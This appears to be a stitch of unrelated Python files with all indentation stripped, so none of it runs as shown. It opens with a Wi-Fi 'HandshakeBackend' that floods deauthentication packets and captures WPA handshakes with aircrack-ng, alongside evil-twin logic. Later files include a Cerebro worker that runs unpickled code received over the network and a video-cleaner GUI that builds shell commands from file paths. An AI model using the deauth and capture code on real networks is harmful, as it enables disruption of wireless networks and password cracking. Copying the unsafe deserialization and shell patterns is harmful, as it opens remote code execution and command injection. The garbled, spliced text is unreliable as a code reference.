for _ in range(attempts):
if not HandshakeBackend.__airodump_is_active():
return
HandshakeBackend.__airodump_process.kill()
time.sleep(0.45)
@staticmethod
def __check_for_handshake():
with HandshakeBackend.__target_lock:
if not HandshakeBackend.__target:
return
if HandshakeBackend.__target.is_captured:
return True
result = subprocess.getoutput(
f"aircrack-ng {settings.HANDSHAKE_OUTPUT}-01.cap"
)
is_captured = len(re.findall(r"[1-9]\shandshake", result)) != 0
if is_captured:
with HandshakeBackend.__target_lock:
HandshakeBackend.__target.is_captured = True
return is_captured
@staticmethod
def __attack():
max_pkts = [96, 128, 256]
ptr = 0
while True:
with HandshakeBackend.__target_lock:
if not HandshakeBackend.__target:
break
if (
not HandshakeBackend.__target.is_active
or HandshakeBackend.__target.is_captured
):
break
for _ in range(max_pkts[ptr]):
try:
HandshakeBackend.__target.deauth.sendp()
except:
break
ptr = ptr + 1 if ptr + 1 < len(max_pkts) else 0
# Wait for clients to reconnect
for _ in range(60):
time.sleep(0.5)
with HandshakeBackend.__target_lock:
if not HandshakeBackend.__target:
break
if not HandshakeBackend.__target.is_active:
break
if HandshakeBackend.__check_for_handshake():
HandshakeBackend.__update_ap_info()
HandshakeBackend.stop_process()
break
with HandshakeBackend.__deauth_lock:
HandshakeBackend.__is_attacking = False
@staticmethod
def __connected_clients_count():
ap_list = (
HandshakeBackend.__accesspoint_details.get_output().value.values()
)
if not len(ap_list):
return 0
return len(list(ap_list)[0]["clients"])
@staticmethod
def perform_attack():
with HandshakeBackend.__deauth_lock:
if HandshakeBackend.__is_attacking:
return
with HandshakeBackend.__target_lock:
if not HandshakeBackend.__target:
return
if (
not HandshakeBackend.__target.is_active
or HandshakeBackend.__target.is_captured
):
return
with HandshakeBackend.__deauth_lock:
HandshakeBackend.__is_attacking = True
t = threading.Thread(target=HandshakeBackend.__attack, daemon=True)
t.start()
@staticmethod
def start_process(bssid, essid, chann):
resp = Resp()
eviltwin_status = (
lib.eviltwin.backend.EviltwinBackend.status().value.get(
"eviltwin", None
)
)
if eviltwin_status:
if eviltwin_status.get("isActive", False):
resp.msg = "Eviltwin is active, cannot start handshake"
return resp
if HandshakeBackend.__target and HandshakeBackend.__target.is_active:
resp.msg = "Handshake process is already active"
return resp
with HandshakeBackend.__target_lock:
HandshakeBackend.__target = Target(bssid, essid, chann)
HandshakeBackend.__start_airodump()
if not HandshakeBackend.__airodump_is_active():
with HandshakeBackend.__target_lock:
HandshakeBackend.__target = None
resp.msg = "Failed to start handshake"
return resp
resp.value = {"target": HandshakeBackend.__target.serialize}
resp.msg = "Handshake process started successfully"
resp.status = Resp.SUCCESS_CODE
return resp
@staticmethod
def stop_process():
resp = Resp()
# if not (HandshakeBackend.__target or HandshakeBackend.__airodump_is_active()):
# resp.status = Resp.SUCCESS_CODE
# resp.msg = 'Handshake process is already inactive'
# return resp
if not HandshakeBackend.__target or not HandshakeBackend.__target.is_active:
resp.status = Resp.SUCCESS_CODE
resp.msg = "Handshake process is already inactive"
return resp
HandshakeBackend.__stop_airodump()
if HandshakeBackend.__airodump_is_active():
resp.msg = "Failed to stop handshake process"
return resp
with HandshakeBackend.__target_lock:
# HandshakeBackend.__target = None
HandshakeBackend.__target.is_active = False
HandshakeBackend.__airodump_process = None
resp.msg = "Successfully stopped handshake process"
resp.status = Resp.SUCCESS_CODE
return resp
@staticmethod
def status():
resp = Resp()
status = {"target": None}
with HandshakeBackend.__target_lock:
if HandshakeBackend.__target:
status["target"] = HandshakeBackend.__target.serialize
resp.value = status
resp.status = Resp.SUCCESS_CODE
return resp
|
amber.py
|
from __future__ import absolute_import
import os
import time
import pytraj as pt
import threading
from .base import BaseMD
class AmberMD(BaseMD):
# TODO: doc
'''
Unstable API
Examples
--------
>>> from nglview.sandbox.amber import AmberMD
>>> amber_view = AmberMD(top='./peptide.top', restart='./md.r', reference='min.rst7')
>>> view = amber_view.initialize()
>>> view
>>> # another cell
>>> amber_view.update(every=1, timeout=3000)
>>> # do other stuff
'''
def __init__(self, top=None, restart=None, reference=None):
self.top = top
assert os.path.exists(restart), '{} must exists'.format(restart)
assert os.path.exists(reference), '{} must exists'.format(reference)
self.restart = restart
self.reference_traj = pt.load(reference, top=self.top)
self.thread = None
self.event = None
def initialize(self, gui=False):
self.view = self.reference_traj.visualize(gui=gui)
return self.view
def update(self, every=1, timeout=3000, callback=None):
"""
Parameters
----------
every : int, default 1 (s)
update coordinates "every" second
timeout : int, default 3000 (s)
stop updating coordinate after "timeout"
callback : func, optional
If given, trajectory will be processed (autoimage, ...)
Must follow func(traj)
"""
# always reset
self.event = threading.Event()
def _update(event):
start = time.time()
while time.time() - start <= timeout and not event.is_set():
time.sleep(every)
traj = pt.load(self.restart, top=self.top)
if callback is not None:
callback(traj)
else:
mask = '@C,N,O,CA,P'
pt.superpose(traj, mask=mask, ref=self.reference_traj)
self._update_coordinates(traj[0].xyz)
# non-blocking so we can use other Jupyter's cells
self.thread = threading.Thread(target=_update, args=(self.event, ))
self.thread.daemon = True
self.thread.start()
def stop(self):
"""Stop update"""
if self.event is not None:
self.event.set()
def _update_coordinates(self, xyz):
self.view.coordinates_dict = {0: xyz}
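# Editor's note: hedged example callback for AmberMD.update(); this helper is an
# editor's assumption, not part of the original module. Per the docstring, a
# callback must accept a single pytraj Trajectory ("Must follow func(traj)").
def _example_update_callback(traj):
    # Re-image coordinates and fit backbone atoms before the updated coordinates
    # are pushed to the NGL view.
    pt.autoimage(traj)
    pt.superpose(traj, mask='@C,CA,N')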
|
worker.py
|
import threading
import queue
import time
from typing import Callable, Optional, Any, Tuple, Dict
class Worker:
_instances = dict()
VERBOSE = False
@classmethod
def instance(cls, id: str) -> "Worker":
if id not in cls._instances:
worker = Worker(id)
worker.start()
cls._instances[id] = worker
return cls._instances[id]
@classmethod
def stop_all(cls):
for worker in cls._instances.values():
worker.stop()
def __init__(self, id: str):
self.id = id
self._queue = queue.Queue()
self._results = dict()
self._thread: Optional[threading.Thread] = None
self._stop = False
def __del__(self):
if self.is_running:
self.stop()
def log(self, *args):
if self.VERBOSE:
print(f"Worker {self.id}: {threading.current_thread().name}:", *args)
@property
def is_running(self):
return self._thread and self._thread.is_alive()
def start(self):
self.log("start")
if self._thread is not None:
raise RuntimeError(f"Worker already started")
self._thread = threading.Thread(target=self._thread_loop)
self._stop = False
self._thread.start()
def stop(self):
self.log("stop")
if self.is_running:
self._queue.put_nowait("STOP")
self._stop = True
self._thread.join()
self._thread = None
def request(self, id: str, func: Callable, extra: Optional[Any] = None):
self.log("request", id, func)
self._queue.put_nowait((id, func, extra))
def pop_result(self, id: str) -> Optional[Dict[str, Any]]:
if id in self._results:
self.log("pop result", id)
result = self._results.pop(id)
return {
"result": result[0],
"extra": result[1],
}
return None
def _thread_loop(self):
threading.current_thread().name = f"{self.id}-thread"
while not self._stop:
try:
self.log("wait for work")
work = self._queue.get(True, timeout=10)
if work == "STOP":
break
except queue.Empty:
continue
self.log("working", work[0])
self._results[work[0]] = (work[1](), work[2])
self.log("finished", work[0])
|
worker.py
|
# Copyright 2021 Supun Nakandala. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import base64
import sys
import threading
import gc
import traceback
import argparse
from xmlrpc.server import SimpleXMLRPCServer
import dill
data_cache = {}
status_dict = {}
def initialize_worker():
"""
Initialize the worker by resetting the caches
:return:
"""
global data_cache
global status_dict
# del data_cache
# del status_dict
data_cache = {}
status_dict = {}
gc.collect()
def execute(exec_id, code_string, params):
# can execute only one at a time
"""
:param exec_id:
:param code_string:
:param params:
:return:
"""
if len([y for y in status_dict.values() if y["status"] == "RUNNING"]) > 0:
return base64.b64encode(dill.dumps("BUSY"))
else:
func = dill.loads(base64.b64decode(code_string))
def bg_execute(exec_id, func, params):
"""
:param exec_id:
:param func:
:param params:
"""
try:
func_result = func(data_cache, *params)
status_dict[exec_id] = {"status": "COMPLETED", "result": func_result}
except Exception as e:
print(e)
print(traceback.format_exc())
sys.stdout.flush()
status_dict[exec_id] = {"status": "FAILED"}
status_dict[exec_id] = {"status": "RUNNING"}
thread = threading.Thread(target=bg_execute, args=(exec_id, func, params,))
thread.start()
return base64.b64encode(dill.dumps("LAUNCHED"))
def status(exec_id):
"""
:param exec_id:
:return:
"""
if exec_id in status_dict:
return base64.b64encode(dill.dumps(status_dict[exec_id]))
else:
return base64.b64encode(dill.dumps({"status": "INVALID ID"}))
def is_live():
return True
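# Editor's note: hedged client-side sketch, not part of this worker module; it shows
# how a driver could ship a function with dill over XML-RPC and poll for the result.
# The default host/port and the example task are assumptions.
def _example_client_sketch(host="localhost", port=7777):
    import time
    from xmlrpc.client import ServerProxy

    proxy = ServerProxy("http://{}:{}".format(host, port), allow_none=True)

    def task(cache, x):
        # ``cache`` is the worker-side data_cache dict; extra args come from params.
        return x * 2

    code_string = base64.b64encode(dill.dumps(task)).decode("ascii")
    launch = dill.loads(base64.b64decode(proxy.execute("exec-1", code_string, [21]).data))
    if launch == "BUSY":
        return None
    # Poll until the background thread reports completion or failure.
    while True:
        state = dill.loads(base64.b64decode(proxy.status("exec-1").data))
        if state["status"] != "RUNNING":
            return state          # e.g. {"status": "COMPLETED", "result": 42}
        time.sleep(0.1)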
def main():
parser = argparse.ArgumentParser(description='Argument parser for generating model predictions.')
parser.add_argument('--hostname', help='Worker host name', default='0.0.0.0')
parser.add_argument('--port', help='Worker port', default=7777, type=int)
args = parser.parse_args()
print('Starting Cerebro worker on {}:{}'.format(args.hostname, args.port))
server = SimpleXMLRPCServer((args.hostname, args.port), allow_none=True)
server.register_function(execute)
server.register_function(status)
server.register_function(initialize_worker)
server.register_function(is_live)
server.serve_forever()
if __name__ == "__main__":
main()
|
customer.py
|
import web3
import time
import eth_account.messages
import web3.contract
import sys
import socket
from threading import Thread, Lock
from lib import *
from Simple import *
from SimpleValidator import *
import json
from lib import w3
import traceback
HOST = '127.0.0.1' # Standard loopback interface address (localhost)
PORT = 29290 # Port to listen on (non-privileged ports are > 1023)
class CustomerInterface: # This class is intended for the customer to interact with the blockchain. It doesn't generate any questions, and doesn't interact with the provider.
def __init__(self, address):
self.customer = Customer(address)
self.qas = {}
self.subscription_address = None
def is_subscription_active(self):
return self.customer.is_subscription_active()
def join_subscription(self, subscription_address):
self.customer.join_subscription(subscription_address)
self.subscription_address = subscription_address
def register_question(self, question):
if not self.customer.get_validator().is_valid_question(question):
print("Question invalid!!!")
return False
q_hash = Signer.hash(question)
if q_hash not in self.qas:
self.qas[q_hash] = QA(question)
#print("registerd:",q_hash)
return True
def register_answer(self, question, answer):
if not self.customer.validator.is_answer_correct(question, answer):
print("Tried to register incorrect answer!")
return
q_hash = Signer.hash(question)
done = False
if q_hash not in self.qas:
self.qas[q_hash] = QA(question, answer=answer)
else:
self.qas[q_hash].set_answer(answer)
def get_all_hashes(self):
answered = []
unanswered = []
for qa in self.qas.values():
if qa.is_answered():
answered.append(qa.get_hash())
else:
unanswered.append(qa.get_hash())
return answered + unanswered, len(unanswered)
def get_signed_hashes(self):
hashes, unanswered = self.get_all_hashes()
return hashes, unanswered, self.sign_hashes(hashes, unanswered)
def sign_hashes(self, hashes, unanswered):
return Signer.sign(hashes, unanswered, self.subscription_address, self.customer.address)
def get_answer(self, question):
q_hash = Signer.hash(question)
if q_hash in self.qas:
return self.qas[q_hash].get_answer()
return None
def check_demand(self):
ret = self.customer.check_demand()
if ret is not None:
question, answer = ret
self.register_answer(question, answer)
return ret
def resolve_demand(self):
demand = self.check_demand()
if demand is not None:
hashes, unanswered, signature = self.get_signed_hashes()
print("Providing: ", hashes, unanswered)
self.provide_signature(hashes, unanswered, signature)
return demand
def provide_signature(self, hashes, unanswered, signature=None):
if signature is None:
signature = self.sign_hashes(hashes, unanswered)
try:
self.customer.provide_signature(hashes, unanswered, signature)
except Exception as e:
print("Coudn't provide signature:", e)
traceback.print_tb(e.__traceback__)
def get_all_answers(self):
questions = []
answers = []
for qa in self.qas.values():
if qa.is_answered():
questions.append(qa.get_question())
answers.append(qa.get_answer())
return questions, answers
def appeal(self, question, hashes=None, unanswered=None):
if not self.register_question(question):
print("Couldn't appeal: question not registered")
return False
signature = None
if hashes is None:
hashes, unanswered, signature = self.get_signed_hashes()
else:
signature = self.sign_hashes(hashes, unanswered)
try:
#print("Appealing with:", Coder.str_question(question), hashes, unanswered, signature)
#print(QA(question).get_hash())
if not self.customer.appeal(question, hashes, unanswered, signature):
raise ""
except Exception as e:
print("Couldn't appeal:", e)
traceback.print_tb(e.__traceback__)
return False
return True
def check_appeal(self):
answer = self.customer.check_appeal()
if answer is not None:
self.register_answer(self.customer.get_question_appealed(), answer)
return answer
def withdraw(self):
return self.customer.withdraw()
# Class for interaction between threads and socket thread
class CommandsList():
def __init__(self):
self.commands = []
self.inputs = []
def insert_command(self, msg):
self.commands.append(msg)
def get_last_input(self):
if len(self.inputs) < 1:
return None
ret, self.inputs = self.inputs[-1], self.inputs[:-1]
return ret
def insert_input(self, inp):
self.inputs.append(inp)
def next(self):
if len(self.commands) < 1:
return None
ret, self.commands = self.commands[0], self.commands[1:]
return ret
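# Editor's note: hedged sketch, not part of the original script, illustrating the
# locking convention used throughout this file: every access to a shared
# CommandsList is guarded by the same Lock (shown here with ``with`` blocks instead
# of the explicit acquire()/try/finally/release() pattern used below).
def _commands_list_usage_sketch():
    cmd_list = CommandsList()
    lock = Lock()
    with lock:
        cmd_list.insert_command({"type": "send_answer"})
    with lock:
        msg = cmd_list.next()   # -> {"type": "send_answer"}; None when queue is empty
    return msg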
def handle_socket_customer(host, port, cmd_list, lock, QUIT_MSG):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((host, port))
s.settimeout(0.2)
while True:
time.sleep(0.1)
inp = None
try:
inp = receive_dict(s)
if inp == None:
#print("CLOSING...")
print("\nSocket connection was closed by provider.")
s.close()
break
except socket.timeout:
pass
except Exception as e:
print(e)
#print("CLOSING...")
s.close()
break
lock.acquire()
try:
if inp is not None:
cmd_list.insert_input(inp)
#print("GOT MSG: ", inp)
msg = cmd_list.next()
finally:
lock.release()
if msg is None:
time.sleep(0.5)
else:
if msg == QUIT_MSG:
print("\nSocket connection was closed by you.")
s.close()
break
#print("SENDING MSG: ", msg)
send_dict(s, msg)
def init_customer(address, host, port):
#provider_int = ProviderInterface(address)
#provider_lock = Lock()
#x = Thread(target=handle_provider, args=(provider_lock, provider_int))
#x.start()
to_join = []
customer_int = CustomerInterface(address)
cmd_list = CommandsList()
lock = Lock()
customer_lock = Lock()
QUIT_MSG = {"close":True}
x = Thread(target=handle_socket_customer, args=(host, port, cmd_list, lock, QUIT_MSG))
x.start()
to_join.append(x)
print("Sending address...")
msg = {"type": "address", "address": str(address)}
lock.acquire()
try:
cmd_list.insert_command(msg)
finally:
lock.release()
print("Waiting for subscription address...")
while True:
lock.acquire()
try:
msg = cmd_list.get_last_input()
finally:
lock.release()
if msg is not None and "type" in msg and msg["type"] == "subscription" and "address" in msg:
customer_int.join_subscription(msg["address"])
break
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#------------------------------------------------
value = input("Manual customer? (y/n):")
if value == "y":
user_customer(customer_int, cmd_list, lock)
else:
num_of_questions = int(input("How many questions to generate (int):"))
value = input("Manual questions? (y/n):")
user_input = value == "y"
value = input("Should customer send questions to provider (otherwise will appeal)? (y/n):")
only_appeals = not (value == "y")
x = Thread(target=auto_customer_background, args=(customer_int, customer_lock))
x.start()
to_join.append(x)
auto_customer(customer_int, customer_lock, cmd_list, lock, user_input, only_appeals, num_of_questions=num_of_questions)
#------------------------------------------------
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'''
lock.acquire()
try:
cmd_list.insert_command(QUIT_MSG)
finally:
lock.release()
for x in to_join:
x.join()
def user_customer(customer_int, cmd_list, lock):
print("Joined Subscription!\n")
print("Commands:")
print("q - exit")
print("new - register new question and send to provider")
print("check - check for new answers from provider")
print("get - get specific answer if submitted by provider")
print("ackall - sign all answers submitted by provider")
print("appeal - appeal a question")
print("status - check appeal and active")
print("demand - check if provider demanded signature")
print("resolve - resolve provider's signature demand")
print("withdraw - withdraw funds from contract")
while(True):
value = input("$>> ")
if value == "q":
break
elif value == "new":
# register new question and send to provider
print("Input new question:")
try:
question = Solver.input()
except Exception as e:
traceback.print_tb(e.__traceback__)
continue
#print("Got new question:",question)
if not customer_int.register_question(question):
print("Warning: invalid question")
hashes, unanswered, signature = customer_int.get_signed_hashes()
#print("providing: ", hashes, unanswered)
msg = {
"type": "new_question",
"question": Coder.encoded_to_stream(question),
"hashes": bytes_to_str(hashes),
"unanswered": unanswered,
"signature": bytes_to_str(signature)}
lock.acquire()
try:
cmd_list.insert_command(msg)
finally:
lock.release()
print("Sent question:", Coder.str_question(question))
elif value == "check":
msg = {"type": "send_answer"}
lock.acquire()
try:
cmd_list.insert_command(msg)
finally:
lock.release()
while True:
time.sleep(0.2)
lock.acquire()
try:
msg = cmd_list.get_last_input()
finally:
lock.release()
if msg is not None:
break
answers = []
questions = []
answers_stream = []
questions_stream = []
if "type" in msg and msg["type"] == "answer" and "answers" in msg and "questions" in msg:
answers_stream = msg["answers"]
questions_stream = msg["questions"]
for i in range(min(len(questions_stream), len(answers_stream))):
answers.append(Coder.stream_to_encoded(answers_stream[i]))
questions.append(Coder.stream_to_encoded(questions_stream[i]))
print("Got answers and questions:")
for i in range(min(len(answers), len(questions))):
answer = answers[i]
question = questions[i]
customer_int.register_answer(question, answer)
print(Coder.str_question(question), "->", Coder.str_answer(answer))
# get next answer from provider
pass
elif value == "get":
# get specific answer
try:
question = Solver.input()
except Exception as e:
traceback.print_tb(e.__traceback__)
continue
answer = customer_int.get_answer(question)
if answer is None:
print("Got no answer yet.")
else:
print("Answer: ", answer)
elif value == "ackall":
# sign all answers submitted by provider
#questions, answers = customer_int.get_all_answers()
hashes, unanswered, signature = customer_int.get_signed_hashes()
msg = {
"type": "ack",
"hashes": bytes_to_str(hashes),
"unanswered": unanswered,
"signature": bytes_to_str(signature)
}
lock.acquire()
try:
cmd_list.insert_command(msg)
finally:
lock.release()
print("Sent ack for all answers")
elif value == "appeal":
try:
question = Solver.input()
except Exception as e:
traceback.print_tb(e.__traceback__)
continue
if not customer_int.appeal(question):
#print("Couldn't appeal - invalid question.")
pass
elif value == "status":
print("Check appeal status: ", customer_int.check_appeal())
elif value == "demand":
ret = customer_int.check_demand()
if ret is None:
print("No demand from provider.")
else:
print("Provider demanded signature for: ")
question, answer = ret
print(Coder.str_question(question), "->", Coder.str_answer(answer))
elif value == "resolve":
ret = customer_int.resolve_demand()
if ret is None:
print("No demand from provider.")
else:
print("Resolved demand for: ")
question, answer = ret
print(Coder.str_question(question), "->", Coder.str_answer(answer))
elif value == "withdraw":
amount = customer_int.withdraw()
if amount > 0:
print("Withdrew:", amount)
break
else:
print("No funds to withdraw")
else:
print("[x] Unknown command:", value)
def auto_customer(customer_int, customer_lock, cmd_list, lock, user_input=False, only_appeals=False, sending_ack=False, auto_file=False, num_of_questions=3):
# Generate all Questions
questions = []
answers = []
if auto_file:
filename, questions = generate_file_questions(customer_int, customer_lock)
else:
for x in range(num_of_questions):
question = None
if user_input:
print("Input next question:")
try:
question = Solver.input()
except Exception as e:
traceback.print_tb(e.__traceback__)
continue
else:
question = Solver.generate()
questions.append(question)
# Send Questions
for question in questions:
# Register Question
customer_lock.acquire()
try:
customer_int.register_question(question)
#print("registed question")
except Exception as e:
traceback.print_tb(e.__traceback__)
print(e)
finally:
customer_lock.release()
# Announce Question to Provider(?)
if only_appeals:
print("Generated question secretly:", Coder.str_question(question))
else:
customer_lock.acquire()
try:
hashes, unanswered, signature = customer_int.get_signed_hashes()
finally:
customer_lock.release()
msg = {
"type": "new_question",
"question": Coder.encoded_to_stream(question),
"hashes": bytes_to_str(hashes),
"unanswered": unanswered,
"signature": bytes_to_str(signature)}
lock.acquire()
try:
cmd_list.insert_command(msg)
finally:
lock.release()
print("Generated and sent question:", Coder.str_question(question))
# Wait for Answer from Provider
t = 0
T = 50
if only_appeals:
T = 1
appealed_block = 0
answer = None
ask_again = True
printed_waiting = False
while True:
#print(".")
# Break if inactive
customer_lock.acquire()
try:
active = customer_int.is_subscription_active()
finally:
customer_lock.release()
if not active:
print("Subscription ended, closing main thread.")
break
t += 1
time.sleep(0.1)
answer = None
customer_lock.acquire()
try:
answer = customer_int.get_answer(question)
finally:
customer_lock.release()
if answer is not None:
print("Got answer from demand!")
break
# Appeal Question
if t == T:
print("Appealing question - took too long for provider to respond.")
customer_lock.acquire()
try:
customer_int.appeal(question)
finally:
customer_lock.release()
appealed_block = w3.eth.blockNumber
printed_waiting = False
# Check if Appeal Resolved
if t > T:
customer_lock.acquire()
try:
answer = customer_int.check_appeal()
finally:
customer_lock.release()
if answer is not None:
customer_lock.acquire()
try:
customer_int.register_answer(question, answer)
finally:
customer_lock.release()
print("Appeal resolved by provider!")
break
if only_appeals:
print("Only appeals")
continue
# Ask for Answers from Provider
if ask_again:
#print("asking again")
msg = {"type": "send_answer"}
lock.acquire()
try:
cmd_list.insert_command(msg)
finally:
lock.release()
ask_again = False
# Receive Answers
msg = None
lock.acquire()
try:
msg = cmd_list.get_last_input()
finally:
lock.release()
if msg is not None:
ask_again = True
else:
continue
answers_ = []
questions_ = []
answers_stream = []
questions_stream = []
if "type" in msg and msg["type"] == "answer" and "answers" in msg and "questions" in msg:
answers_stream = msg["answers"]
questions_stream = msg["questions"]
for i in range(min(len(answers_stream), len(questions_stream))):
answer_ = Coder.stream_to_encoded(answers_stream[i])
question_ = Coder.stream_to_encoded(questions_stream[i])
answers_.append(answer_)
questions_.append(question_)
customer_lock.acquire()
try:
customer_int.register_answer(question_, answer_)
finally:
customer_lock.release()
# Send Ack for Answers
if sending_ack:
# sign all answers submitted by provider
#questions, answers = customer_int.get_all_answers()
customer_lock.acquire()
try:
hashes, unanswered, signature = customer_int.get_signed_hashes()
finally:
customer_lock.release()
msg = {
"type": "ack",
"hashes": bytes_to_str(hashes),
"unanswered": unanswered,
"signature": bytes_to_str(signature)
}
lock.acquire()
try:
cmd_list.insert_command(msg)
finally:
lock.release()
print("Sent ack for all answers")
if question not in questions_:
if not printed_waiting:
print("question not answered - waiting...")
printed_waiting = True
time.sleep(0.1)
continue
print("Received answer from provider.")
got_correct = False
for i in range(len(questions_)):
if questions_[i] == question:
answer = answers_[i]
ret = False
customer_lock.acquire()
try:
ret = customer_int.customer.validator.is_answer_correct(question, answer)
finally:
customer_lock.release()
if not ret:
if t < T:
print("Answer incorrect!")
t = T-1
else:
got_correct = True
if got_correct:
break
if answer is not None:
print("Got answer: ", Coder.str_answer(answer))
answers.append(answer)
else:
print("Got no answer.")
customer_lock.acquire()
try:
active = customer_int.is_subscription_active()
finally:
customer_lock.release()
if not active:
break
if auto_file:
file = open('./FilesReceived/' + filename, 'wb')
for answer in answers:
answer = Coder.decode_answer(answer)
print(answer)
file.write(answer[1])
file.close()
print("Saved file to ./FilesReceived/" + filename)
if len(answers) < len(questions):
print("File saved is partial - not all answers recevied.")
# Resolve Demands
def auto_customer_background(customer_int, customer_lock):
while True:
active = False
customer_lock.acquire()
try:
active = customer_int.is_subscription_active()
finally:
customer_lock.release()
if not active:
print("Subscription ended, closing background thread.")
break
time.sleep(0.05)
customer_lock.acquire()
try:
ret = customer_int.resolve_demand()
finally:
customer_lock.release()
if not (ret is None):
print("Resolved demand for: ")
question, answer = ret
print(Coder.str_question(question), "->", Coder.str_answer(answer))
customer_lock.acquire()
try:
amount = customer_int.withdraw()
finally:
customer_lock.release()
print("Withdrew funds:", amount)
return
# Generate Queries for all chunks of a File
def generate_file_questions(customer_int, customer_lock):
filename = input("File name:")
customer_lock.acquire()
try:
chunks = customer_int.customer.validator.contract.functions.get_chunks_num(filename).call()
finally:
customer_lock.release()
questions = []
for x in range(chunks):
question = Coder.encode_question([filename, x])
questions.append(question)
return filename, questions
if __name__ == '__main__':
#print(sys.argv)
#print(len(sys.argv))
if(len(sys.argv) < 2):
print("USAGE: <filename> address [port]")
sys.exit()
address = sys.argv[1]
port = PORT
if(len(sys.argv) > 2):
port = int(sys.argv[2])
from main import HOST
init_customer(address, HOST, port)
|
shell.py
|
"""Command execution in bash shells"""
import time
import threading
from mara_pipelines import config
from mara_pipelines.logging import logger
from .logging import SingerTapReadLogThread
def singer_run_shell_command(command: str, log_command: bool = True):
"""
Runs a command in a bash shell and logs the output of the command in (near)real-time according to the
singer specification: https://github.com/singer-io/getting-started/blob/master/docs/SPEC.md#output
Args:
command: The command to run
log_command: When true, then the command itself is logged before execution
Returns:
Either (in order)
- False when the exit code of the command was not 0
- True when there was no output to stdout
- The output to stdout, as an array of lines
"""
import shlex, subprocess, threading
if log_command:
logger.log(command, format=logger.Format.ITALICS)
process = subprocess.Popen(shlex.split(config.bash_command_string()) + ['-c', command],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True)
# keep stdout output
output_lines = []
# unfortunately, only file descriptors and the system streams can be passed to
# subprocess.Popen(..) (and not custom streams without a file handle).
# So in order to be able to log the output in real-time, we have to
# query the output streams of the process from two separate threads
def read_process_stdout():
for line in process.stdout:
output_lines.append(line)
logger.log(line, format=logger.Format.VERBATIM)
read_stdout_thread = threading.Thread(target=read_process_stdout)
read_stdout_thread.start()
read_singertaplog_thread = SingerTapReadLogThread(process=process)
read_singertaplog_thread.start()
# wait until the process finishes
while process.poll() is None:
time.sleep(0.005)
read_stdout_thread.join()
read_singertaplog_thread.join()
if read_singertaplog_thread.has_error:
logger.log('Singer tap error occurred', is_error=True, format=logger.Format.ITALICS)
return False
exitcode = process.returncode
if exitcode != 0:
logger.log(f'exit code {exitcode}', is_error=True, format=logger.Format.ITALICS)
return False
return output_lines or True
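# --- Illustrative usage sketch (not part of the original module) ---
# Because this module uses a relative import, it is meant to be imported from a
# mara pipeline rather than run directly; the snippet below only illustrates how
# the three possible return values would be handled. The echoed STATE message is
# a made-up stand-in for a real singer tap command.
#
# result = singer_run_shell_command('echo \'{"type": "STATE", "value": {}}\'')
# if result is False:
#     ...  # command failed or the singer log reported an error
# elif result is True:
#     ...  # command produced no stdout output
# else:
#     ...  # result is the list of captured stdout lines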
|
main.py
|
import os
import subprocess
import sys
import threading
from time import sleep
import tkinter as tk
from tkinter import filedialog
root = tk.Tk()
root.title('视频库清理助手 V0.1.2')
many = int(0)
quit1 = 0
wait1 = 0
continueY = 0
potONorOFF = 0
file_name = '0'
now_dir = '0'
now_name = 0
work_dir = tk.StringVar()
pot_dir = tk.StringVar()
pot_dir.set('C:\\"Program Files"\DAUM\PotPlayer\PotPlayerMini64.exe ')
def control():
def wait_set():
global wait1
wait1 = 1
def quit_set():
global quit1
global continueY
control_window.destroy()
if potONorOFF == 1:
killedPotplayer()
continueY = 1
quit1 = 1
def continue_set():
global continueY
continueY = 1
control_window = tk.Tk()
control_window.title('请选择是否保留')
control_window.geometry('300x150')
control_window.wm_attributes('-topmost', 1)
delete_bt = tk.Button(control_window, text='删除此视频及同名文件', command=delete)
quit_bt = tk.Button(control_window, text='停止筛选视频文件', command=quit_set)
wait_bt = tk.Button(control_window, text='暂停视频筛选', command=wait_set)
continue_bt = tk.Button(control_window, text='继续视频筛选', command=continue_set)
delete_bt.pack()
quit_bt.pack()
wait_bt.pack()
continue_bt.pack()
control_window.mainloop()
def openPotplayer(filename):
global work_dir
global dont_dir
global output_dir
global many
global potONorOFF
potONorOFF = 1
subprocess.call(pot_dir.get() + filename, shell=True)
# os.system(pot_dir.get() + filename)
potONorOFF = 0
def killedPotplayer():
subprocess.call('taskkill /f /im PotPlayerMini64.exe', shell=True)
#os.system('taskkill /f /im PotPlayerMini64.exe')
def mv():
pass
def delete():
os.remove(file_name)
for name in os.listdir(now_dir):
if name.find(now_name[:-3]) != -1 and name[-3:] != 'mkv' and name[-3:] != 'mp4' and name[-3:] != 'avi':
os.remove(str(now_dir) + '/' + str(name))
def find():
global work_dir
global now_dir
control_run = threading.Thread(target=control)
control_run.start()
for root, dirs, files in os.walk(work_dir.get()):
now_dir = root
for name in files:
global many
global file_name
global now_name
global wait1
global continueY
global quit1
filename = os.path.join(root, name)
if str(filename[-3:]) == 'mp4' or str(filename[-3:]) == 'mkv' or str(filename[-3:]) == 'avi':
now_name = name
file_name = filename
openPotplayer(filename)
many = many + 1
if wait1 == 1:
while continueY == 0:
sleep(0.1)
wait1 = 0
continueY = 0
if quit1 == 1:
break
else:
continue
break
sys.exit()
# Walk the working directory to collect video files, tracking the current directory and file name
def set_dir():
global WorkDirPrint
global work_dir
work_dir.set(filedialog.askdirectory())
def set_pot_dir():
global pot_dir
pot_dir.set(filedialog.askopenfilename())
def quit():
sys.exit()
set_dir_bt = tk.Button(root, text='设置工作目录', command=set_dir)
start_bt = tk.Button(root, text='开始筛选视频文件', command=find)
quit_bt = tk.Button(root, text='退出', command=quit)
set_pot_dir_bt = tk.Button(root, text='设置potplayer程序位置', command=set_pot_dir)
WorkDirPrint = tk.Label(root, textvariable=work_dir)
pot_dir_print = tk.Label(root, textvariable=pot_dir)
pot_dir_print.grid(row=0, column=1)
set_pot_dir_bt.grid(row=0, column=0)
set_dir_bt.grid(row=1, column=0)
WorkDirPrint.grid(row=1, column=1)
start_bt.grid(row=2, column=0)
quit_bt.grid(row=2, column=1)
root.mainloop()
# ===========================================================================================
|
example_test.py
|
import re
